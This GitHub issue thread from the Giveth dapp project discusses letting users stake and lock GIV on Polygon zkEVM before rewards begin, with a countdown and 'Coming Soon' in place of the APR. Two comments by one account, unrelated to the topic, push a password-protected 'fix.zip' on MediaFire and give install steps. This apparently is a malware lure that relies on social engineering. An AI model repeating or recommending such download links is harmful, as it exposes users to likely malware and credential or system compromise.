### ISSUE TITLE
Add countdown timer on GIV staking for zkEVM

### ISSUE THREAD

**Issue by laurenluz** [Giveth/giveth-dapps-v2#4625]
Before the staking rewards officially begin (e.g. September), we would like to enable the user to stake (and lock?) their GIV for GIVpower on polygon zkEVM.

This way, people can bridge their GIV in advance and we have some stakers already active when the rewards do go live.

In the past, we had a "coundown" on the farm cards that allowed for this feature... basically counting down the time until the 1st official notify reward.

Ideally, we could have this on production a few days before the rewards go like (so if notify reward is September 3, this is on prod by Aug 30)

What's required:
- the user can stake GIV
- the user can lock their GIV (we should hide the APR, and not show zero, but we can show the user their multiplier and the GIVpower they would get)
- the user can choose to unstake GIV that is not locked
- the APR is hidden, and we instead show a countdown timer to when notify reward begins

We don't have a design for the lockups part... so if it is too challenging to put together, we can cut it from scope (or I can ask Mo for a mockup).

@MohammadPCh you probably remember this from the old GIVfarm days, do you think you could support?

cc @mohammadranjbarz

**Comment by laurenluz** [comment]
it definitely won't accomodate the lockups (hiding the APR but still allowing the user to lock tokens). should I ask Mo for a design for the lockup modals where the APR is hidden? or perhaps we just put "Coming Soon" instead of the APR % during the countdown phase for all these modals:

![image](https://github.com/user-attachments/assets/bb4df96e-9bdf-4578-9891-acd08e25bbb5)
![image](https://github.com/user-attachments/assets/3f8f294e-e9fd-4b5e-837f-2888c2ba7464)
![image](https://github.com/user-attachments/assets/543e8bf0-8b48-4998-a69c-8b5e0120bd47)

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MohammadPCh** [comment]
I think the `coming soon` is enough.

**Comment by mohammadranjbarz** [comment]
> I think the `coming soon` is enough.

I used the existing coming soon feature, just add another thing to not showing APR when farm is not started yet in lock menu

@MohammadPCh 
Can you confirm the code(https://github.com/Giveth/giveth-dapps-v2/commit/edbe663791dbefd634b21cff0811d90961071a79)?

@laurenluz  Can you confirm the UI/UX (https://giveth-dapps-v2-git-addpolygonzkevmgivpower-givethio.vercel.app/givfarm)?

**Comment by laurenluz** [comment]
@mohammadranjbarz
- [ ] Can we make the APR instead of "?" show "Coming Soon"
- [ ] And also the copy "you are locking..." this should be white text, not this weird grey blue. I made this issue/comment before.
- [ ] Finally, can we make the primary button text say "Lock your GIV" instead of "Increase your Reward"... but make it say that ONLY during the countdown timer and not after the rewards go live?

![image](https://github.com/user-attachments/assets/9a42acbb-01c4-48fb-9089-414dcacccb21)

**Comment by mohammadranjbarz** [comment]
> @mohammadranjbarz
> 
> * [x]  Can we make the APR instead of "?" show "Coming Soon"
> * [x]  And also the copy "you are locking..." this should be white text, not this weird grey blue. I made this issue/comment before.
> * [x]  Finally, can we make the primary button text say "Lock your GIV" instead of "Increase your Reward"... but make it say that ONLY during the countdown timer and not after the rewards go live?
> 
> ![image](https://private-user-images.githubusercontent.com/75490971/361889447-9a42acbb-01c4-48fb-9089-414dcacccb21.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ4MzM2NzAsIm5iZiI6MTcyNDgzMzM3MCwicGF0aCI6Ii83NTQ5MDk3MS8zNjE4ODk0NDctOWE0MmFjYmItMDFjNC00OGZiLTkwODktNDE0ZGNhY2NjYjIxLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjglMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI4VDA4MjI1MFomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWJlMzUxZjk4ZmJlNTIzMGI0MzhhYWM3YWViNzk4MThiNjNmNDkwNzM1MTlmZjc1ZjhlY2MyOWZlZjU3MTQ3ZmQmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.h3Zaxe27WA3u-ILz_4YisDJlj_1TfgOFPhjv8jzIIuE)

@laurenluz  I did your desired changes, you can check it yourself in https://giveth-dapps-v2-git-addpolygonzkevmgivpower-givethio.vercel.app/givfarm

<img width="458" alt="Screenshot 1403-06-07 at 11 52 01 in the morning" src="https://github.com/user-attachments/assets/2ddefe71-91e6-42b6-9849-19c6b3fcddd0">
<img width="384" alt="Screenshot 1403-06-07 at 11 52 17 in the morning" src="https://github.com/user-attachments/assets/a6f11f85-6711-408d-ad4f-64390ca0a2ad">

FYI @maryjaf
